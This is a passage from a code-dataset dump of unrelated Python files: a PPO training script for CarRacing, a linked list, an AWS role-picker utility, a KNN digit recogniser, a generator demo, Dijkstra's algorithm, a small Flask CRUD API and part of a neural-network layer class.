self.lp(x.float())\n\n
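# Editor's note (hedged sketch): for CarRacing-v0's 96x96x3 observations the\n# feature size that ConvProcess produces can be derived instead of hard-coded:\n#   conv1 (k=8, s=4): (96 - 8) // 4 + 1 = 23\n#   conv2 (k=4, s=2): (23 - 4) // 2 + 1 = 10\n#   conv3 (k=3, s=1): (10 - 3) // 1 + 1 = 8   ->  64 * 8 * 8 = 4096 features,\n# which matches the conv_out_size constant defined further down.\n\n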
class Env:\n    '''\n    Environment wrapper class\n    '''\n\n    game_rew = 0\n    last_game_rew = 0\n    game_n = 0\n    last_games_rews = [-200]\n    n_iter = 0\n\n    def __init__(self, env_name, n_steps, gamma, gae_lambda, save_video=False):\n        super(Env, self).__init__()\n\n        # create the new env\n        self.env = gym.make(env_name)\n        self.obs = self.env.reset()\n\n        self.n_steps = n_steps\n        self.action_n = self.env.action_space.shape\n        self.observation_n = self.env.observation_space.shape[0]\n        self.gamma = gamma\n        self.gae_lambda = gae_lambda\n\n    def steps(self, agent_policy, agent_value, conv):\n        '''\n        Execute the agent for n_steps in the environment\n        '''\n        memories = []\n        for s in range(self.n_steps):\n            self.n_iter += 1\n            state = conv(self.obs)\n            self.env.render()\n\n            # get the agent policy\n            ag_mean = agent_policy(state)\n\n            # get an action following the policy distribution\n            logstd = agent_policy.logstd.data.cpu().numpy()\n            action = ag_mean.data.cpu().numpy() + np.exp(logstd) * \\\n                np.random.normal(size=logstd.shape)\n            action = np.clip(action, -1, 1)\n\n            state_value = float(agent_value(state))\n            new_obs, reward, done, _ = self.env.step(action)\n\n            # Update memories with latest action\n            if done:\n                # Change the reward to 0 in case the episode has ended\n                memories.append(Memory(obs=self.obs, state=state, action=action, new_obs=new_obs,\n                                       reward=0, done=done, value=state_value, adv=0))\n            else:\n                memories.append(Memory(obs=self.obs, state=state, action=action, new_obs=new_obs,\n                                       reward=reward, done=done, value=state_value, adv=0))\n\n            self.game_rew += reward\n            self.obs = new_obs\n            if done:\n                print('#####', self.game_n, 'rew:', int(self.game_rew), int(\n                    np.mean(self.last_games_rews[-100:])), np.round(reward, 2), self.n_iter)\n\n                # reset the environment\n                self.obs = self.env.reset()\n                self.last_game_rew = self.game_rew\n                self.game_rew = 0\n                self.game_n += 1\n                self.n_iter = 0\n                self.last_games_rews.append(self.last_game_rew)\n\n        # compute the discounted advantage of the memories and return it\n        return self.generalized_advantage_estimation(memories)\n\n    def generalized_advantage_estimation(self, memories):\n        '''\n        Calculate the advantage-discounted reward as in the PPO paper\n        '''\n        upd_memories = []\n        run_add = 0\n\n        for t in reversed(range(len(memories) - 1)):\n            if memories[t].done:\n                run_add = memories[t].reward\n            else:\n                sigma = memories[t].reward + self.gamma * \\\n                    memories[t + 1].value - memories[t].value\n                # GAE recurrence: A_t = delta_t + gamma * lambda * A_{t+1};\n                # the running advantage is scaled by gamma * lambda, not added to it\n                run_add = sigma + self.gamma * self.gae_lambda * run_add\n\n            # Update memories with the discounted reward\n            upd_memories.append(Memory(obs=memories[t].obs, state=memories[t].state, action=memories[t].action, new_obs=memories[t].new_obs,\n                                       reward=run_add + memories[t].value, done=memories[t].done, value=memories[t].value, adv=run_add))\n\n        return upd_memories[::-1]\n\n
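# Hedged worked example of the recurrence above: with gamma=0.99, lambda=0.95\n# and two steps where delta_1 = 1.0 and delta_0 = 0.5,\n#   A_1 = 1.0\n#   A_0 = 0.5 + 0.99 * 0.95 * 1.0 = 1.4405\n# i.e. later TD-errors are discounted into earlier advantages.\n\n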
def log_policy_prob(mean, std, actions):\n    # policy log probability\n    act_log_softmax = -((mean - actions)**2) / (2 * torch.exp(std).clamp(min=1e-4)\n                                                ) - torch.log(torch.sqrt(2 * math.pi * torch.exp(std)))\n    return act_log_softmax\n\n\ndef compute_log_policy_prob(memories, nn_policy, device):\n    '''\n    Run the policy on the observations in the memories and compute the policy log probability\n    '''\n    # stack the stored conv features as tensors (no .detach()/.numpy()) so\n    # gradients can flow back through the conv net when the losses are\n    # backpropagated\n    n_mean = nn_policy(torch.stack([m.state for m in memories]).to(device))\n    n_mean = n_mean.type(torch.DoubleTensor)\n    # use the logstd of the policy that was passed in, not a global network\n    logstd = nn_policy.logstd.type(torch.DoubleTensor)\n\n    actions = torch.DoubleTensor(\n        np.array([m.action for m in memories])).to('cpu')\n\n    return log_policy_prob(n_mean, logstd, actions)\n\n\nMemory = namedtuple('Memory', ['obs', 'state', 'action', 'new_obs',\n                               'reward', 'done', 'value', 'adv'])  # namedtuple's 'verbose' kwarg no longer exists in Python 3.7+\n\n\ndef clipped_PPO_loss(memories, nn_policy, nn_value, old_log_policy, adv, epsilon, writer, device):\n    '''\n    Clipped PPO loss as in the paper\n    It returns the clipped policy loss and the value loss\n    '''\n\n    # State value\n    rewards = torch.tensor(\n        np.array([m.reward for m in memories], dtype=np.float32)).to(device)\n    value = nn_value(torch.tensor(\n        np.array([m.obs for m in memories], dtype=np.float32)).to(device))\n    # Value loss\n    vl_loss = F.mse_loss(value.squeeze(-1), rewards)\n\n    new_log_policy = compute_log_policy_prob(memories, nn_policy, device)\n    rt_theta = torch.exp(new_log_policy - old_log_policy)\n\n    adv = adv.unsqueeze(1)\n    pg_loss = -torch.mean(torch.min(rt_theta * adv,\n                                    torch.clamp(rt_theta, 1 - epsilon, 1 + epsilon) * adv))\n\n    return pg_loss, vl_loss\n\n\ndef clipped_PPO_loss_plusconv(memories, nn_policy, nn_value, old_log_policy, adv, epsilon, writer, device):\n    '''\n    Clipped PPO loss as in the paper, plus a combined loss for the conv net\n    It returns the clipped policy loss, the value loss and the conv loss\n    '''\n\n    # State value, computed from the stored conv features (graph kept intact)\n    rewards = torch.tensor(\n        np.array([m.reward for m in memories], dtype=np.float32)).to(device)\n    value = nn_value(torch.stack([m.state for m in memories]).to(device))\n\n    # Value loss\n    vl_loss = F.mse_loss(value.squeeze(-1), rewards)\n\n    new_log_policy = compute_log_policy_prob(memories, nn_policy, device)\n    rt_theta = torch.exp(new_log_policy - old_log_policy).to(device)\n\n    adv = adv.unsqueeze(1)\n    pg_loss = -torch.mean(torch.min(rt_theta * adv,\n                                    torch.clamp(rt_theta, 1 - epsilon, 1 + epsilon) * adv))\n\n    # combined magnitude of both losses, built from the live tensors so the\n    # gradient can reach the conv net through the stored features\n    conv_loss = torch.sqrt(pg_loss ** 2 + vl_loss ** 2)\n\n    return pg_loss, vl_loss, conv_loss\n\n\ndef test_game(test_env, agent_policy, conv_net, test_episodes):\n    reward_games = []\n    steps_games = []\n\n    for _ in range(test_episodes):\n        obs = test_env.reset()\n        rewards = 0\n        steps = 0\n        while True:\n            test_env.render()\n            state = conv_net(obs)\n            ag_mean = agent_policy(state.clone().detach())\n            action = np.clip(ag_mean.data.cpu().numpy().squeeze(), -1, 1)\n\n            next_obs, reward, done, _ = test_env.step(action)\n            steps += 1\n            obs = next_obs\n            rewards += reward\n\n            if done:\n                reward_games.append(rewards)\n                steps_games.append(steps)\n                obs = test_env.reset()\n                break\n\n    return np.mean(reward_games), np.mean(steps_games)\n\n
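# Reference note (hedged): the clipped surrogate objective implemented above is\n#   L_clip = E[ min(r_t(theta) * A_t, clip(r_t(theta), 1 - eps, 1 + eps) * A_t) ]\n# with r_t(theta) = pi_theta(a_t|s_t) / pi_theta_old(a_t|s_t), computed here in\n# log-space as exp(new_log_policy - old_log_policy).\n\n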
# HYPERPARAMETERS\n# ENV_NAME = 'BipedalWalker-v2'\nENV_NAME = 'CarRacing-v0'\n\nMAX_ITER = 500000\n\nBATCH_SIZE = 128\nPPO_EPOCHS = 10\ndevice = 'cpu'\n# if torch.cuda.is_available():\n#     device = 'cuda'\nCLIP_GRADIENT = 0.2\nCLIP_EPS = 0.2\n\nTRAJECTORY_SIZE = 2049\nGAE_LAMBDA = 0.95\nGAMMA = 0.99\n\n\n# Test hyperparameters\ntest_episodes = 5\nbest_test_result = -1e5\nsave_video_test = True\nN_ITER_TEST = 100\n\nPOLICY_LR = 0.0004\nVALUE_LR = 0.001\nCONV_LR = 0.00005\n\nhidden_layer_size = 32\n# YOU SHOULD TOTALLY MAKE THIS PROGRAMMATIC (see the shape derivation above)\nconv_out_size = 4096\n\nnow = datetime.datetime.now()\ndate_time = \"{}_{}.{}.{}\".format(now.day, now.hour, now.minute, now.second)\n\nload_model = False\ncheckpoint_name = \"checkpoints\"\n\n\nif __name__ == \"__main__\":\n    # Create the env\n    env = Env(ENV_NAME, TRAJECTORY_SIZE, GAMMA, GAE_LAMBDA)\n\n    writer_name = 'PPO_'+ENV_NAME+'_'+date_time+'_' + \\\n        str(POLICY_LR)+'_'+str(VALUE_LR)+'_' + \\\n        str(TRAJECTORY_SIZE)+'_'+str(BATCH_SIZE)\n    writer = SummaryWriter(log_dir='content/runs/' + writer_name)\n\n    test_env = gym.make(ENV_NAME)\n    if save_video_test:\n        test_env = gym.wrappers.Monitor(test_env, \"content/TEST_VIDEOS_/\" +\n                                        writer_name, video_callable=lambda episode_id: episode_id % 10 == 0)\n\n    # Init convnet\n    conv_net = ConvProcess(3, 3, device).to(device)\n    # Initialize the actor and critic networks\n    agent_policy = A2C_policy(\n        conv_out_size, test_env.action_space.shape[0], hidden_layer_size, hidden_layer_size).to(device)\n    agent_value = A2C_value(conv_out_size, hidden_layer_size).to(device)\n\n    # Init policy and value optimizers\n    optimizer_policy = optim.Adam(\n        agent_policy.parameters(), lr=POLICY_LR)\n    optimizer_value = optim.Adam(\n        agent_value.parameters(), lr=VALUE_LR)\n    optimizer_conv = optim.Adam(conv_net.parameters(), lr=CONV_LR)\n\n    # FOR LOADING A TRAINED MODEL\n    if load_model:\n        print('> Loading checkpoint {}'.format(checkpoint_name))\n        checkpoint = torch.load(checkpoint_name)\n        agent_policy.load_state_dict(checkpoint['agent_policy'])\n        agent_value.load_state_dict(checkpoint['agent_value'])\n        conv_net.load_state_dict(checkpoint['conv_net'])\n        optimizer_policy.load_state_dict(checkpoint['optimizer_policy'])\n        optimizer_value.load_state_dict(checkpoint['optimizer_value'])\n        optimizer_conv.load_state_dict(checkpoint['optimizer_conv'])\n\n    experience = []\n    n_iter = 0\n\n    while n_iter < MAX_ITER:\n        # Start timer ====================================\n        start = time.time()\n        n_iter += 1\n\n        # Thread.join() returns None, so collect each worker's rollout in a\n        # shared list instead. (Note: both workers share the same Env instance.)\n        step_results = []\n\n        def collect_steps():\n            step_results.append(env.steps(agent_policy, agent_value, conv_net))\n\n        e1 = threading.Thread(target=collect_steps)\n        e2 = threading.Thread(target=collect_steps)\n        e1.start()\n        e2.start()\n        e1.join()\n        e2.join()\n\n        batch = list(step_results[0]) + list(step_results[1])\n\n        # compute the policy probability with the old policy network\n        old_log_policy = compute_log_policy_prob(batch, agent_policy, device)\n\n        # Gather the advantage from memory\n        batch_adv = np.array([m.adv for m in batch])\n        # NORMALIZE TO STABILIZE THE NETWORK\n        batch_adv = (batch_adv - np.mean(batch_adv)) / \\\n            (np.std(batch_adv) + 1e-7)\n        batch_adv = torch.tensor(batch_adv).to(device)\n\n
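        # Note (hedged): normalising advantages to zero mean / unit variance is a\n        # common PPO variance-reduction trick; it rescales the policy gradient per\n        # batch without changing which actions are favoured.\n\n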
        # Variables for loss\n        pol_loss_acc = []\n        val_loss_acc = []\n        conv_loss_acc = []\n\n        # execute PPO_EPOCHS epochs\n        for s in range(PPO_EPOCHS):\n            # compute the loss and optimize over mini batches of the size BATCH_SIZE\n            for mb in range(0, len(batch), BATCH_SIZE):\n                mini_batch = batch[mb: mb + BATCH_SIZE]\n                minib_old_log_policy = old_log_policy[mb: mb + BATCH_SIZE]\n                minib_adv = batch_adv[mb: mb + BATCH_SIZE]\n\n                # compute the PPO clipped loss, the value loss and the conv loss\n                pol_loss, val_loss, conv_loss = clipped_PPO_loss_plusconv(\n                    mini_batch, agent_policy, agent_value, minib_old_log_policy, minib_adv, CLIP_EPS, writer, device)\n\n                # the conv features stored in the memories are reused across\n                # minibatches and epochs, so every backward pass keeps the graph\n                # optimize the policy network\n                optimizer_policy.zero_grad()\n                pol_loss.backward(retain_graph=True)\n                optimizer_policy.step()\n\n                # optimize the value network\n                optimizer_value.zero_grad()\n                val_loss.backward(retain_graph=True)\n                optimizer_value.step()\n\n                # optimize the conv network; conv_loss combines the policy and\n                # value losses and reaches the conv net through the stored features\n                optimizer_conv.zero_grad()\n                conv_loss.backward(retain_graph=True)\n                optimizer_conv.step()\n\n                pol_loss_acc.append(float(pol_loss))\n                val_loss_acc.append(float(val_loss))\n                conv_loss_acc.append(float(conv_loss))\n\n        print(time.time() - start)\n\n        # add scalars to the tensorboard\n        writer.add_scalar('pg_loss', np.mean(pol_loss_acc), n_iter)\n        writer.add_scalar('vl_loss', np.mean(val_loss_acc), n_iter)\n        writer.add_scalar('rew', env.last_game_rew, n_iter)\n        writer.add_scalar('10rew', np.mean(env.last_games_rews[-100:]), n_iter)\n\n        # Test the agent\n        if n_iter % N_ITER_TEST == 0:\n            test_rews, test_stps = test_game(\n                test_env, agent_policy, conv_net, test_episodes)\n            print(' > Testing..', n_iter, test_rews, test_stps)\n            # if it achieves the best results so far, save the models\n            if test_rews > best_test_result:\n                # guarded removal: the files do not exist before the first save\n                for stale in ('ppo_conv.pt', 'ppo_policy.pt', 'ppo_value.pt'):\n                    if os.path.exists(stale):\n                        os.remove(stale)\n                torch.save(conv_net, 'ppo_conv.pt')\n                torch.save(agent_policy, 'ppo_policy.pt')\n                torch.save(agent_value, 'ppo_value.pt')\n                print(\"Saved model of game\", n_iter)\n\n                torch.save({\n                    'agent_policy': agent_policy.state_dict(),\n                    'agent_value': agent_value.state_dict(),\n                    'conv_net': conv_net.state_dict(),\n                    'optimizer_policy': optimizer_policy.state_dict(),\n                    'optimizer_value': optimizer_value.state_dict(),\n                    'optimizer_conv': optimizer_conv.state_dict(),\n                    'test_reward': test_rews\n                }, 'checkpoints/checkpoint_'+writer_name+'.pth.tar')\n                best_test_result = test_rews\n
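                # Note (hedged): torch.save(module, path) above pickles the whole\n                # class, tying the file to this exact source layout; the\n                # state_dict checkpoint is the more portable format of the two.\n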
                print('=> Best test!! Reward:{:.2f} Steps:{}'.format(\n                    test_rews, test_stps))\n\n            writer.add_scalar('test_rew', test_rews, n_iter)\n\n    writer.close()\n","sub_path":"ppo/ASYNC_train.py","file_name":"ASYNC_train.py","file_ext":"py","file_size_in_byte":17885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"547859704","text":"class No:\n    def __init__(self,item = None,proximo = None):\n        self.item = item\n        self.proximo = proximo\n\nclass Lista:\n    def __init__(self):\n        self.primeiro = self.ultimo = No()\n        self.tamanhoLista = 0\n    def vazia(self):\n        return self.primeiro == self.ultimo\n    def inserir(self,item):\n        self.ultimo.proximo = No(item)\n        self.ultimo = self.ultimo.proximo\n        self.tamanhoLista += 1\n    def inserirInicio(self, item):\n        self.primeiro.proximo = No(item,self.primeiro.proximo)\n        if self.vazia():\n            self.ultimo = self.primeiro.proximo\n        self.tamanhoLista += 1\n    def inserirOrdenado(self,item):\n        if self.vazia():\n            self.inserir(item)\n            return\n        anterior = self.primeiro\n        atual = self.primeiro.proximo\n        while not atual is None and atual.item < item:\n            anterior = atual\n            atual = atual.proximo\n        anterior.proximo = No(item,atual)\n        if atual is None:\n            self.ultimo = anterior.proximo\n        self.tamanhoLista += 1\n    def inserirAres(self,verticeA,verticeB):\n        aux = self.primeiro.proximo\n        verificador = 0\n        while verificador < verticeA and not aux is None:\n            aux = aux.proximo\n            verificador += 1\n        aux.item.append(verticeB)\n        verificador = 0\n        aux = self.primeiro.proximo\n        while verificador < verticeB and not aux is None:\n            aux = aux.proximo\n            verificador += 1\n        aux.item.append(verticeA)\n    def pesquisa(self, item):\n        aux = self.primeiro.proximo\n        while not aux is None and aux.item != item:\n            aux = aux.proximo\n        return aux is None and None or aux.item\n    def removerInicio(self):\n        if self.vazia():\n            return None\n        aux = self.primeiro.proximo\n        self.primeiro.proximo = aux.proximo\n        item = aux.item\n        if aux == self.ultimo:\n            self.ultimo = self.primeiro\n        aux.proximo = None\n        del aux\n        self.tamanhoLista -= 1\n        return item\n    def removerFim(self):\n        if self.vazia():\n            return None\n        aux = self.primeiro\n        while aux.proximo != self.ultimo:\n            aux = aux.proximo\n        item = self.ultimo.item\n        aux.proximo = None\n        self.ultimo = aux\n        self.tamanhoLista -= 1\n        return item\n    def __str__(self):\n        s = \"[\"\n        aux = self.primeiro.proximo\n        while not aux is None:\n            s += str(aux.item) + ','\n            aux = aux.proximo\n        s = s.strip(\",\")\n        s += \"]\"\n        return s\n    def __getitem__(self, index):\n        if self.vazia():\n            raise IndexError(\"the list is empty\")\n        if index >= self.tamanhoLista or index < 0:\n            raise IndexError(\"invalid index\")\n        aux = self.primeiro.proximo\n        ponteiro = 0\n        while index > ponteiro:\n            aux = aux.proximo\n            ponteiro += 1\n        return aux.item\n    def __len__(self):\n        return self.tamanhoLista\n","sub_path":"grafo-listas-adjacentes/Lista.py","file_name":"Lista.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"199648434","text":"#!/usr/bin/env python\n\nimport os\n\n\nclass Util:\n\n    @staticmethod\n    def get_input(prompt):\n        try:\n            return raw_input(prompt)\n        except NameError:\n            return input(prompt)\n\n    @staticmethod\n    def pick_a_role(roles):\n        while True:\n            for i, role in enumerate(roles):\n                print(\"[{:>3d}] {}\".format(i + 1, role))\n\n            prompt = 'Type the number (1 - {:d}) of the role to assume: '.format(len(roles))\n            choice = Util.get_input(prompt)\n\n            try:\n                return 
list(roles.items())[int(choice) - 1]\n            except IndexError:\n                print(\"Invalid choice, try again.\")\n\n    @staticmethod\n    def touch(file_name, mode=0o600):\n        flags = os.O_CREAT | os.O_APPEND\n        with os.fdopen(os.open(file_name, flags, mode)) as f:\n            try:\n                os.utime(file_name, None)\n            finally:\n                f.close()\n\n    # This method returns the first non-None value in args. If all values are\n    # None, None will be returned. If there are no arguments, None will be\n    # returned.\n    @staticmethod\n    def coalesce(*args):\n        for value in args:\n            if value is not None:\n                return value\n        return None\n\n    @staticmethod\n    def unicode_to_string_if_needed(object):\n        if \"unicode\" in str(object.__class__):\n            return object.encode('utf-8')\n        else:\n            return object\n","sub_path":"aws_google_auth/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"285566743","text":"from tensorflow.keras import datasets\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\n# Although tensorflow is imported, its neural-network framework is not actually\n# used; it only serves to fetch and lightly preprocess the dataset\n# Prepare the data\n(train_images, train_labels), (test_images, test_labels) = datasets.mnist.load_data()\n# The training images are stored in a uint8 array of shape (60000, 28, 28) with values in [0, 255].\n# We need to transform it into a float32 array of shape (60000, 28 * 28) with values in the range 0-1.\ntrain_images = train_images.reshape(60000, 28*28).astype('float32') / 255\ntest_images = test_images.reshape(10000, 28*28).astype('float32') / 255\n# The commented-out test below uses the MNIST train/test split to measure the\n# accuracy of this simplest form of KNN; my result was roughly 80%\n\n# Display a digit\ndef showNum(image):\n    img = image.reshape(28, 28)\n    plt.imshow(img, cmap='Greys', interpolation='nearest')\n    plt.show()\n    return\n\n# Handwriting part\ndef handwrite():\n    # ####### set the path below correctly #######\n    image = Image.open('handwrite.png').convert('L')  # open the image with PIL's Image.open\n    # .convert('L') converts the colour image of shape (28,28,3) to greyscale (28,28)\n    image_arr = np.array(image)  # convert to a numpy array\n    image_arr = np.reshape(image_arr, 28 * 28).astype('float32') / 255\n    # binarise: pure white (1.0) becomes background 0, everything else becomes ink 1\n    for i in range(28*28):\n        if(image_arr[i]==1):\n            image_arr[i]=0\n        else:\n            image_arr[i]=1\n    showNum(image_arr)\n    # get the training set\n    train_data = train_images[0:60000, :]\n    # compute the Euclidean distances to all training samples\n    dist = (np.sqrt(np.sum(np.square(image_arr - train_data), axis=1)))\n    # take the mode of the labels of the 3 nearest samples\n    minsort = dist.argsort()[:3]\n    tablesort = train_labels[minsort]\n    cout = np.bincount(tablesort)\n    coutmax = np.argmax(cout)\n    # print the result\n    print('The recognised handwritten digit is:', coutmax)\n    return\n\n'''\n# KNN test part\ndef knn_test(test_sum, train_sum, k):\n    print(\"Testing the accuracy of the KNN algorithm\")\n    accracy_num = 0\n    for i in range(test_sum):\n        test_data = test_images[i]\n        train_data = train_images[0:train_sum, :]\n        dist = (np.sqrt(np.sum(np.square(test_data-train_data), axis=1)))\n        minsort = dist.argsort()[:k]\n        tablesort = train_labels[minsort]\n        cout = np.bincount(tablesort)\n        coutmax = np.argmax(cout)\n        predict = coutmax\n        real_data = test_labels[i]\n        if predict == real_data:\n            accracy_num += 1\n        # print(\"predicted:\", predict, \"actual:\", real_data)\n    accracy = accracy_num/test_sum\n    print(\"accuracy:\", accracy)\n    return accracy\n'''\nhandwrite()\n","sub_path":"KNN/HandWrite/HandWrite.py","file_name":"HandWrite.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"627884192","text":"#python_counter_using_generator.py\n\n#function counts up every time you call it\n\n
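# A hedged alternative sketch: the same counter written as an iterator object,\n# so a fresh, restartable iteration just means constructing a new instance:\n#\n# class CounterIter:\n# \tdef __init__(self, start, stop):\n# \t\tself.current, self.stop = start, stop\n# \tdef __iter__(self):\n# \t\treturn self\n# \tdef __next__(self):\n# \t\tif self.current >= self.stop:\n# \t\t\traise StopIteration\n# \t\tself.current += 1\n# \t\treturn self.current - 1\n\n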
class my_counter:\n\tdef __init__(self, start, stop):\n\t\tself.current=start\n\t\tself.stop=stop\n\n\tdef count(self):\n\t\tprint('inside generator')\n\t\twhile self.current < self.stop:\n\t\t\tyield self.current\n\t\t\tself.current+=1\n\ncounter_obj=my_counter(2,10)\n\nfor num in counter_obj.count():\n\tprint(num)\n\n\n#now if I want to use it again, I need to create another object\nmy_gen=my_counter(2,10).count()\nprint(next(my_gen))\nprint(next(my_gen))\nprint(next(my_gen))\n\n#now this won't work if I try to use it again (counter_obj is already exhausted)\n# my_gen2=counter_obj.count()\n# print(next(my_gen2))\n\n\nprint('now trying the manual version')\nclass manual_counter:\n\tdef __init__(self, start, stop):\n\t\tself.current=start\n\t\tself.stop=stop\n\n\tdef count(self):\n\t\tif self.current < self.stop:\n\t\t\tself.current+=1\n\t\t\treturn self.current\n\nmy_mc=manual_counter(1,10)\nprint(my_mc.count())\nprint(my_mc.count())\nprint(my_mc.count())\nprint(my_mc.count())","sub_path":"python_counter_using_generator.py","file_name":"python_counter_using_generator.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"181832653","text":"#Dijkstra's Algorithm\nimport collections\nimport math\nimport timeit\n\n\nclass Graph:\n    def __init__(self):\n        self.vertices = set()\n        self.edges = collections.defaultdict(list)\n        self.weights = {}\n\n    def add_vertex(self, value):\n        self.vertices.add(value)\n\n    def add_edge(self, from_vertex, to_vertex, distance):\n        if from_vertex == to_vertex:\n            return  # disallow self-loops ('pass' here would fall through and add one anyway)\n        self.edges[from_vertex].append(to_vertex)\n        self.weights[(from_vertex, to_vertex)] = distance\n\n    def __str__(self):\n        string = \"Vertices: \" + str(self.vertices) + \"\\n\"\n        string += \"Edges: \" + str(self.edges) + \"\\n\"\n        string += \"Weights: \" + str(self.weights)\n        return string\n\n\ndef dijkstra(graph, start):\n    S = set()\n    delta = dict.fromkeys(list(graph.vertices), math.inf)\n    previous = dict.fromkeys(list(graph.vertices), None)\n    delta[start] = 0\n    while S != graph.vertices:\n        v = min((set(delta.keys()) - S), key=delta.get)\n        for neighbor in set(graph.edges[v]) - S:\n            new_path = delta[v] + graph.weights[v, neighbor]\n            if new_path < delta[neighbor]:\n                delta[neighbor] = new_path\n                previous[neighbor] = v\n        S.add(v)\n    return (delta, previous)\n\n\ndef shortest_path(graph, start, end):\n    delta, previous = dijkstra(graph, start)\n    path = []\n    vertex = end\n    while vertex is not None:\n        path.append(vertex)\n        vertex = previous[vertex]\n    path.reverse()\n    return path\n\ng = Graph()\ng.add_vertex('A')\ng.add_vertex('B')\ng.add_vertex('C')\ng.add_vertex('D')\ng.add_vertex('E')\ng.add_vertex('F')\ng.add_vertex('G')\ng.add_vertex('H')\ng.add_vertex('I')\n\ng.add_edge('A', 'B', 22)\ng.add_edge('A', 'C', 9)\ng.add_edge('A', 'D', 12)\ng.add_edge('B', 'C', 35)\ng.add_edge('B', 'F', 36)\ng.add_edge('B', 'H', 34)\ng.add_edge('C', 'F', 42)\ng.add_edge('C', 'E', 65)\ng.add_edge('C', 'D', 4)\ng.add_edge('D', 'E', 33)\ng.add_edge('D', 'I', 30)\ng.add_edge('E', 'F', 18)\ng.add_edge('E', 'G', 23)\ng.add_edge('F', 'H', 24)\ng.add_edge('F', 'G', 39)\ng.add_edge('G', 'H', 25)\ng.add_edge('G', 'I', 21)\ng.add_edge('H', 'I', 19)\n\n# print(g)\n# print('###')\nprint(shortest_path(g,'A','I'))\n\nt = timeit.Timer(\"shortest_path(g,'A','I')\",\"from __main__ import shortest_path, g\")\nresults = t.repeat(5, 10000)\nfor i,item in enumerate(results):\n    print(i, '\t' , 
item)\n","sub_path":"program_a.py","file_name":"program_a.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"49157707","text":"from django.http import (HttpResponse,\n HttpResponseNotFound)\nfrom whats_fresh.whats_fresh_api.models import Theme\n\nimport json\nfrom .serializer import FreshSerializer\nfrom whats_fresh.whats_fresh_api.functions import get_limit\n\n\ndef theme_list(request):\n \"\"\"\n */themes/*\n\n Returns a list of all themes in the database. The ?limit= parameter\n limits the number of themes returned.\n \"\"\"\n error = {\n 'status': False,\n 'name': None,\n 'text': None,\n 'level': None,\n 'debug': None\n }\n\n limit, error = get_limit(request, error)\n\n serializer = FreshSerializer()\n queryset = Theme.objects.all()[:limit]\n\n if not queryset:\n error = {\n \"status\": True,\n \"name\": \"No Themes\",\n \"text\": \"No Themes found\",\n \"level\": \"Information\",\n \"debug\": \"\"\n }\n\n data = {\n \"themes\": json.loads(serializer.serialize(queryset)),\n \"error\": error\n }\n\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n\n\ndef theme_details(request, id=None):\n \"\"\"\n */admin/whats_fresh_api/theme/*\n\n Returns the theme data for theme .\n \"\"\"\n data = {}\n\n error = {\n 'status': False,\n 'name': None,\n 'text': None,\n 'level': None,\n 'debug': None\n }\n\n try:\n theme = Theme.objects.get(id=id)\n except Exception as e:\n data['error'] = {\n 'status': True,\n 'name': 'Theme Not Found',\n 'text': 'Theme id %s was not found.' % id,\n 'level': 'Error',\n 'debug': '{0}: {1}'.format(type(e).__name__, str(e))\n }\n return HttpResponseNotFound(\n json.dumps(data),\n content_type=\"application/json\"\n )\n\n serializer = FreshSerializer()\n\n data = json.loads(serializer.serialize(theme))\n\n data['error'] = error\n\n return HttpResponse(json.dumps(data), content_type=\"application/json\")\n","sub_path":"whats_fresh/whats_fresh_api/views/theme.py","file_name":"theme.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"400789382","text":"import json\n\nfrom flask import Blueprint, jsonify, request, render_template\n\nfrom app.models import User\nfrom app.workflow.core import WorkFlow, WorkFlowError\n\nbp = Blueprint('bp', __name__)\n\n\n@bp.route('/users/', methods=['GET'])\ndef query_records():\n user_id = request.args.get('user_id')\n if user_id:\n user = User.objects(user_id=user_id).first()\n if not user:\n return jsonify({'error': 'data not found'})\n else:\n return jsonify(user)\n else:\n return jsonify(User.objects())\n\n\n@bp.route('/users/', methods=['POST'])\ndef create_record():\n record = json.loads(request.data)\n user = User(**record)\n user.save()\n return jsonify(user)\n\n\n@bp.route('/users/', methods=['PUT'])\ndef update_record():\n record = json.loads(request.data)\n user = User.objects(user_id=record['user_id']).first()\n if not user:\n return jsonify({'error': 'data not found'})\n else:\n user.update(**record)\n return jsonify(user)\n\n\n@bp.route('/users/', methods=['DELETE'])\ndef delete_record():\n record = json.loads(request.data)\n user = User.objects(user_id=record['user_id']).first()\n if not user:\n return jsonify({'error': 'data not found'})\n else:\n user.delete()\n return jsonify(user)\n\n\n@bp.route('/', methods=['GET'])\ndef index():\n return render_template('index.html')\n\n\n@bp.route('/uploader', 
methods=['POST'])\ndef upload_file():\n if request.method == 'POST':\n f = request.files['file']\n json_ = f.read()\n try:\n workflow = WorkFlow(json_)\n except WorkFlowError as e:\n return jsonify({\"Error\": str(e)})\n else:\n workflow_history = workflow.run()\n return render_template('history.html', history=workflow_history)","sub_path":"app/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"84367463","text":"import numpy as np\nfrom Optimization import Optimizers\nfrom Layers.Base import BaseLayer\n\n\nclass FullyConnected(BaseLayer):\n\n # constructor\n def __init__(self, input_size, output_size):\n super().__init__()\n self.input_size = input_size\n self.output_size = output_size\n\n # protected member: _optimizer\n self._optimizer = None\n\n self.grad_weights = None\n\n # w: (input_size+1, output_size)\n self.weights = np.random.uniform(0, 1, (self.input_size+1, self.output_size))\n\n # x:(batch_size, input_size+1)\n self.input = np.ndarray\n\n # property: optimizer, gradient_weights\n @property\n def optimizer(self):\n return self._optimizer\n\n @optimizer.setter\n def optimizer(self, new_optimizer):\n self._optimizer = new_optimizer\n\n @property\n def gradient_weights(self):\n return self.grad_weights\n\n def forward(self, input_tensor):\n 